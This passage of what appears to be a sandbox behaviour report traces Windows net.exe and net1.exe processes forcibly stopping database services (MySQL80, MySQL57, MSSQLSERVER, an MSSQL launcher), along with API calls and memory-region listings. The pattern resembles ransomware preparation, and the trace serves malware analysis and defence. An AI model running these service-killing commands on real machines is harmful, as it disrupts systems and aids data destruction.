(_String1="help", _String2="stop") returned -11 [0106.683] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.683] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.683] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.683] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.683] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.683] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.683] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.683] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.683] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.683] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.683] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.683] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$TPS") returned -12 [0106.683] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$TPS") returned -10 [0106.683] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$TPS") returned -10 [0106.683] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$TPS") returned -10 [0106.683] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$TPS") returned -10 [0106.683] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$TPS") returned -7 [0106.683] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$TPS") returned -7 [0106.683] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$TPS") returned -6 [0106.683] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$TPS") returned -6 [0106.683] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$TPS") returned -5 [0106.683] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$TPS") returned -5 [0106.683] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$TPS") returned -1 [0106.683] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$TPS") returned 3 [0106.683] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$TPS") returned 7 [0106.684] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$TPS") returned 8 [0106.684] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$TPS") returned 8 [0106.684] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$TPS") returned -12 [0106.684] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$TPS") returned -14 [0106.684] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$TPS") returned 5 [0106.684] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$TPS") returned 5 [0106.684] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$TPS") returned 1 [0106.684] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$TPS") returned 5 [0106.684] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$TPS") returned 5 [0106.684] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$TPS") returned 5 [0106.684] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$TPS") returned 10 [0106.684] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$TPS") returned 10 [0106.684] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$TPS") returned 10 [0106.684] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$TPS") returned 3 [0106.684] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$TPS") returned -9 [0106.684] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$TPS") returned -1 [0106.684] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$TPS") returned 6 [0106.684] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$TPS") returned -1 [0106.684] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$TPS") returned -12 [0106.684] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$TPS") returned 1 [0106.685] _wcsupr (in: _String="MSSQLFDLauncher$TPS" | out: _String="MSSQLFDLAUNCHER$TPS") returned="MSSQLFDLAUNCHER$TPS" [0106.685] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x30ce40 [0106.689] GetServiceKeyNameW (in: hSCManager=0x30ce40, lpDisplayName="MSSQLFDLAUNCHER$TPS", lpServiceName=0xffa35750, lpcchBuffer=0x12fd88 | out: lpServiceName="", lpcchBuffer=0x12fd88) returned 0 [0106.690] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$TPS") returned -12 [0106.690] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$TPS") returned -14 [0106.690] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0106.690] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0106.690] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0106.690] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0106.690] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0106.690] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0106.690] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0106.690] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0106.690] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$TPS") returned 3 [0106.690] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$TPS") returned -9 [0106.690] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$TPS") returned -1 [0106.690] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$TPS") returned 6 [0106.690] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$TPS") returned 6 [0106.691] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$TPS") returned 6 [0106.691] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$TPS") returned -1 [0106.691] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$TPS") returned -12 [0106.691] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$TPS") returned 1 [0106.691] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$TPS", opcode=0x0, arg=0x0, bufptr=0x12fd90 | out: bufptr=0x12fd90) returned 0x889 [0106.692] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.692] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0106.693] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.694] GetFileType (hFile=0xb) returned 0x2 [0106.694] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc58 | out: lpMode=0x12fc58) returned 1 [0106.695] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12fc50, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x12fc50*=0x1e) returned 1 [0106.695] GetFileType (hFile=0xb) returned 0x2 [0106.695] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc58 | out: lpMode=0x12fc58) returned 1 [0106.695] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc50, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x12fc50*=0x2) returned 1 [0106.696] _ultow (in: _Dest=0x889, _Radix=1244352 | out: _Dest=0x889) returned="2185" [0106.696] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.696] GetFileType (hFile=0xb) returned 0x2 [0106.696] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc58 | out: lpMode=0x12fc58) returned 1 [0106.696] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12fc50, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x12fc50*=0x34) returned 1 [0106.697] GetFileType (hFile=0xb) returned 0x2 [0106.697] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc58 | out: lpMode=0x12fc58) returned 1 [0106.697] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc50, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x12fc50*=0x2) returned 1 [0106.698] NetApiBufferFree (Buffer=0x304d60) returned 0x0 [0106.698] NetApiBufferFree (Buffer=0x30c130) returned 0x0 [0106.698] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" [0106.698] exit (_Code=2) Process: id = "221" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5b383000" os_pid = "0x7e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8625 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8626 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8627 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8628 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8629 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8630 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8631 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8632 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8633 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8634 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8635 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8636 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8637 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8638 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8639 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8842 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8843 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8844 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8845 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8846 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8847 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8848 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8849 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 8850 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8851 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8852 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8853 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8854 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8855 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8856 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8857 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8858 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8859 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8860 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8861 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 681 os_tid = 0x9d8 Process: id = "222" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e2a3000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8668 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8669 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8670 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8671 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8672 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8673 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8674 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8675 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8676 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8677 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 8678 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8679 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 683 os_tid = 0xb28 Process: id = "223" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x54450000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "215" os_parent_pid = "0x824" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8680 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8681 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8682 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8683 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 8684 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8685 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8686 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8687 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8688 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8689 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8690 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8691 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 8692 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8693 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8694 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8695 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8696 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8697 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8698 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 8699 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 8700 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8701 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8702 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8703 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8704 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8705 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8706 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8707 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8708 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8709 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8710 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8711 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8712 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8713 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8714 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8715 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8716 start_va = 